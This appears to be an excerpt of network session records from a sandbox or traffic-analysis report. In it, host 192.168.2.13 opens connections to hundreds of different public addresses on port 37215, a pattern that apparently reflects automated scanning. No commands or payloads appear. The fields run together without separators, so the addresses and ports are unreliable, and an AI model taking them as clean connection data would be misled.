                                                  19550192.168.2.134554841.169.249.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19551192.168.2.1341742157.22.212.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19552192.168.2.134691241.219.108.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19553192.168.2.1356722157.209.79.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19554192.168.2.1337270157.159.232.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19555192.168.2.1360680197.169.206.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19556192.168.2.13455128.232.0.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19557192.168.2.1359228197.196.137.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19558192.168.2.1337710157.248.248.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19559192.168.2.133656041.114.60.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19560192.168.2.1359840157.115.139.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19561192.168.2.135853241.82.197.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19562192.168.2.134404841.25.141.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19563192.168.2.135757641.5.46.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19564192.168.2.1339102197.2.38.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19565192.168.2.1342940157.225.241.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19566192.168.2.1353472157.52.232.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19567192.168.2.135606841.153.6.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19568192.168.2.1347882193.89.113.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19569192.168.2.135657241.170.149.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19570192.168.2.1354968159.84.252.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19571192.168.2.1348572157.235.105.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19572192.168.2.1337128157.19.207.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19573192.168.2.1355140107.227.162.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19574192.168.2.135139241.235.9.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19575192.168.2.1342902177.21.116.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19576192.168.2.134576440.54.220.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19577192.168.2.134052441.43.28.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19578192.168.2.1339240157.247.45.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19579192.168.2.1360036157.115.164.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19580192.168.2.133442641.172.224.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19581192.168.2.1356484197.105.152.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19582192.168.2.1343910182.79.157.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19583192.168.2.134972641.83.20.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19584192.168.2.1338512199.179.45.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19585192.168.2.1345306197.53.31.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19586192.168.2.1338072197.168.33.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19587192.168.2.1348572157.202.193.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19588192.168.2.134081641.51.200.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19589192.168.2.1348420157.251.254.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19590192.168.2.133771861.220.145.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19591192.168.2.133732641.241.82.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19592192.168.2.1357388197.19.248.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19593192.168.2.134477441.201.7.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19594192.168.2.1352014157.75.12.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19595192.168.2.1343312126.11.35.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19596192.168.2.1352582100.61.53.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19597192.168.2.1339482197.169.145.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19598192.168.2.133745841.47.116.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19599192.168.2.134156441.231.168.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19600192.168.2.1356304161.221.193.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19601192.168.2.1349698197.47.226.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19602192.168.2.1346842117.198.157.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19603192.168.2.1351234157.9.142.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19604192.168.2.1347168197.254.157.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19605192.168.2.133772641.128.136.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19606192.168.2.134893672.7.172.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19607192.168.2.1334220157.188.250.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19608192.168.2.1332866157.87.225.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19609192.168.2.135737441.161.216.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19610192.168.2.1348632170.128.175.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19611192.168.2.134056041.245.123.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19612192.168.2.134039441.189.93.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19613192.168.2.1359662157.49.21.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19614192.168.2.135226241.45.46.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19615192.168.2.134122641.212.14.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19616192.168.2.1334898157.99.121.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19617192.168.2.1354724157.235.137.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19618192.168.2.134476041.114.174.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19619192.168.2.1357484132.152.70.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19620192.168.2.1334594197.203.129.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19621192.168.2.1340314197.113.5.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19622192.168.2.136074665.255.46.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19623192.168.2.1341750197.119.124.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19624192.168.2.1334594197.230.104.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19625192.168.2.1357022150.49.233.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19626192.168.2.1358362197.155.196.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19627192.168.2.1341488157.204.87.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19628192.168.2.134503892.169.69.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19629192.168.2.135129441.238.196.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19630192.168.2.1357782157.16.252.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19631192.168.2.1354096103.63.83.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19632192.168.2.133290241.227.131.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19633192.168.2.1354450197.119.23.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19634192.168.2.1355978197.39.129.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19635192.168.2.1337448197.131.100.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19636192.168.2.1357878157.26.223.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19637192.168.2.1353002176.191.44.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19638192.168.2.1354560197.187.37.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19639192.168.2.1346232157.171.92.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19640192.168.2.133415295.44.162.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19641192.168.2.1334526157.186.13.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19642192.168.2.134699841.19.49.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19643192.168.2.1353912157.76.198.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19644192.168.2.135403831.105.135.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19645192.168.2.13402004.36.41.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19646192.168.2.135626041.122.190.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19647192.168.2.1356142157.83.141.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19648192.168.2.1333332179.109.77.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19649192.168.2.1332996157.78.4.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19650192.168.2.1341796197.195.145.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19651192.168.2.135314641.10.52.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19652192.168.2.1359488157.78.162.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19653192.168.2.135087841.215.74.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19654192.168.2.1356784172.240.138.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19655192.168.2.1358464157.45.101.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19656192.168.2.1333130197.166.91.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19657192.168.2.1337028157.84.22.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19658192.168.2.1345716197.85.198.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19659192.168.2.1346688197.16.90.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19660192.168.2.1339430157.30.194.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19661192.168.2.1354846197.150.178.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19662192.168.2.1348856197.125.45.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19663192.168.2.1356308157.150.22.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19664192.168.2.1354660197.68.15.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19665192.168.2.135121041.168.133.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19666192.168.2.1357112157.163.120.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19667192.168.2.133429841.8.19.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19668192.168.2.1349228197.110.176.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19669192.168.2.1356202197.134.119.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19670192.168.2.135050841.225.242.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19671192.168.2.1338136197.69.126.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19672192.168.2.1360226157.142.64.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19673192.168.2.133990841.60.198.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19674192.168.2.1338034172.127.162.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19675192.168.2.1335394197.182.21.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19676192.168.2.1333514197.126.235.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19677192.168.2.13448241.179.54.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19678192.168.2.134687841.173.176.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19679192.168.2.1337450157.12.68.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19680192.168.2.134610261.29.87.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19681192.168.2.1355112157.157.127.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19682192.168.2.135198041.117.169.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19683192.168.2.1347738197.195.1.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19684192.168.2.134441241.11.193.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19685192.168.2.135840041.112.117.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19686192.168.2.1337240116.147.182.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19687192.168.2.1355910193.248.207.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19688192.168.2.134606641.22.223.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19689192.168.2.134115241.138.234.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19690192.168.2.133397841.10.129.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19691192.168.2.1333958197.192.47.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19692192.168.2.1339870197.28.196.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19693192.168.2.1347210157.147.252.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19694192.168.2.1350538157.53.82.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19695192.168.2.1339418157.98.213.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19696192.168.2.1347878197.110.209.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19697192.168.2.1355542157.104.68.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19698192.168.2.1333296157.217.72.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19699192.168.2.1343030157.132.207.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19700192.168.2.1334072157.145.37.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19701192.168.2.134976841.4.116.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19702192.168.2.133808641.76.43.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19703192.168.2.1339576212.217.230.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19704192.168.2.1343512197.196.53.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19705192.168.2.1338320157.103.131.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19706192.168.2.1339776197.139.201.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19707192.168.2.1351902157.87.43.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19708192.168.2.135013241.15.137.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19709192.168.2.134886441.47.240.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19710192.168.2.134170041.231.184.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19711192.168.2.1341770156.69.73.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19712192.168.2.1358984197.208.39.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19713192.168.2.1356588197.83.61.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19714192.168.2.1333970157.5.221.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19715192.168.2.1349314197.47.152.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19716192.168.2.1351130157.24.110.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19717192.168.2.1354578157.238.141.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19718192.168.2.134467041.71.210.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19719192.168.2.135496041.33.96.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19720192.168.2.133970841.201.214.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19721192.168.2.135455223.123.0.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19722192.168.2.1336488157.102.123.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19723192.168.2.134053254.207.241.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19724192.168.2.1348482157.159.175.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19725192.168.2.1346154197.242.81.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19726192.168.2.1352606157.239.145.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19727192.168.2.134345041.246.231.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19728192.168.2.1341178197.189.153.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19729192.168.2.1355154197.70.106.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19730192.168.2.1338546222.212.137.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19731192.168.2.1344982117.28.149.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19732192.168.2.1345626157.68.52.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19733192.168.2.133761641.116.74.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19734192.168.2.134135265.229.135.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19735192.168.2.1339166197.67.228.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19736192.168.2.134325041.225.105.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19737192.168.2.1345512157.232.237.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19738192.168.2.1359322197.242.59.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19739192.168.2.135867841.170.134.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19740192.168.2.1359610197.204.79.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19741192.168.2.133346441.4.179.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19742192.168.2.1339144197.74.84.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19743192.168.2.1333260157.147.93.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19744192.168.2.1345490157.186.65.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19745192.168.2.1348218157.174.54.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19746192.168.2.1341470197.231.207.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19747192.168.2.1347084157.219.106.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19748192.168.2.1336638151.234.250.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19749192.168.2.135504241.199.31.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19750192.168.2.133845841.153.155.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19751192.168.2.1356730198.154.52.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19752192.168.2.1349056197.253.27.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19753192.168.2.134609841.150.213.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19754192.168.2.134108441.100.57.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19755192.168.2.1355968129.38.233.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19756192.168.2.1344576197.104.9.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19757192.168.2.1352302197.72.174.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19758192.168.2.1348602193.217.120.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19759192.168.2.1360536107.190.90.19237215
